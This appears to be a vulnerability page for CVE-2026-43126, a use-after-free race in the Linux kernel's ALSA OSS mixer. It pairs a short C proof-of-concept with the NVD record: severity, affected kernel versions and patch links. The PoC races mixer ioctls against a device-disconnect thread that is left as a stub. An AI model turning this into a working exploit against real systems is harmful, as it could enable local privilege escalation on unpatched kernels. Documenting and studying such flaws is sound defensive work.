CVE-2026-43126

/* * PoC Concept for CVE-2026-43126 * Triggering race condition in ALSA OSS mixer layer * Compile: gcc -o poc cve_2026_43126.c */ #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/soundcard.h> #include <stdio.h> #include <pthread.h> int fd; void *trigger_mixer_ops(void *arg) { int vol; // Continuously trigger mixer operations to simulate pending calls while(1) { ioctl(fd, SOUND_MIXER_READ_VOLUME, &vol); } return NULL; } void *trigger_disconnect(void *arg) { // In a real exploit scenario, this would trigger the device disconnect // e.g., by unloading the module or simulating hardware removal. // sleep(1); // Slight delay to allow ops to start // system("rmmod snd_pcm_oss"); printf("Simulating disconnect timing...\n"); return NULL; } int main() { pthread_t t1, t2; // Open the mixer device fd = open("/dev/mixer", O_RDWR); if (fd < 0) { perror("open mixer failed"); return -1; } printf("Starting PoC for CVE-2026-43126...\n"); // Create threads to race mixer ops against disconnect pthread_create(&t1, NULL, trigger_mixer_ops, NULL); pthread_create(&t2, NULL, trigger_disconnect, NULL); pthread_join(t1, NULL); pthread_join(t2, NULL); close(fd); return 0; }

{"cve": {"id": "CVE-2026-43126", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:29.597", "lastModified": "2026-05-08T17:56:07.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: mixer: oss: Add card disconnect checkpoints\n\nALSA OSS mixer layer calls the kcontrol ops rather individually, and\npending calls might be not always caught at disconnecting the device.\n\nFor avoiding the potential UAF scenarios, add sanity checks of the\ncard disconnection at each entry point of OSS mixer accesses. The\nrwsem is taken just before that check, hence the rest context should\nbe covered by that properly."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12", "versionEndExcluding": "6.12.75", "matchCriteriaId": "29679A93-33A1-4349-A8F1-5CC7D69D3797"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/084d5d44418148662365eced3e126ad1a81ee3e2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8c097cf736993454acf3f711a3b376d6c7ad8965", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ae583f113d15fa97e5234133c20d09f8e6214e47", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e6645e625480cdf1079a4265f758d13b70721029", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}